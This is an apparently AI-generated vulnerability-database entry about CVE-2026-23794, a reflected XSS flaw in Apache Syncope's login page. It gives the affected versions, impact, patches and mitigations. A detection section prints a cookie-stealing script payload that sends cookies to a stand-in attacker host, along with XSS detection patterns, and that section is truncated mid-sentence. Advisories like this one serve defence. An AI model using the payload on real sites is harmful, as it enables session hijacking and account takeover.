
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-23794 is a reflected Cross-Site Scripting (XSS) vulnerability in Apache Syncope's Enduser Login page that allows an attacker to steal user credentials by tricking a legitimate user into clicking a malicious link. It affects Apache Syncope versions 3.0.0 through 3.0.15 and 4.0.0 through 4.0.3. The vulnerability was disclosed on February 2–3, 2026, with credit given to finders Kasper Karlsson and Karin Taliga. It carries a CVSS v3.1 base score of 6.8 (Medium) (GitHub Advisory, Openwall OSS-Sec).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-controlled input on the Syncope Enduser Login page before it is reflected back in the HTTP response. An attacker crafts a malicious URL containing an injected script payload targeting the login page; when a legitimate user clicks the link and proceeds to authenticate, the malicious script executes in the victim's browser context. Exploitation requires the attacker to have a low-privilege account and requires user interaction (clicking the crafted link), but the scope is changed, meaning the impact can extend beyond the vulnerable component itself. The affected Maven package is org.apache.syncope.client.idrepo:syncope-client-idrepo-common-ui (GitHub Advisory, Openwall OSS-Sec).
Successful exploitation allows an attacker to steal the victim's credentials and session tokens at the moment of authentication, potentially enabling full account takeover within the Apache Syncope identity management environment. Because the scope is changed, the attacker's access may extend to other resources and users managed by the Syncope instance, amplifying the risk beyond the individual victim. Availability and integrity of data are not directly impacted by this vulnerability, but the high confidentiality impact reflects the sensitivity of the stolen authentication material (GitHub Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> in an unsanitized parameter).%3Cscript%3E, onerror=, onload=) in query string parameters.Apache has released patched versions addressing this vulnerability: upgrade to Apache Syncope 3.0.16 (for the 3.0.x branch) or Apache Syncope 4.0.4 (for the 4.0.x branch). As an interim measure, deploying a Web Application Firewall (WAF) with XSS filtering rules can reduce exposure while patching is planned. Organizations should also educate users about phishing risks and the dangers of clicking unsolicited links, particularly those leading to authentication pages (GitHub Advisory, Openwall OSS-Sec).
The vulnerability was covered by SecurityOnline.info as part of a broader report on Apache Syncope login-related security flaws, noting both XSS and XXE issues patched in the same release cycle (SecurityOnline). The disclosure followed standard Apache Security Team processes, with the oss-security mailing list notification and a GitHub Advisory published on February 3, 2026. No significant social media controversy or notable researcher commentary beyond the initial disclosure has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."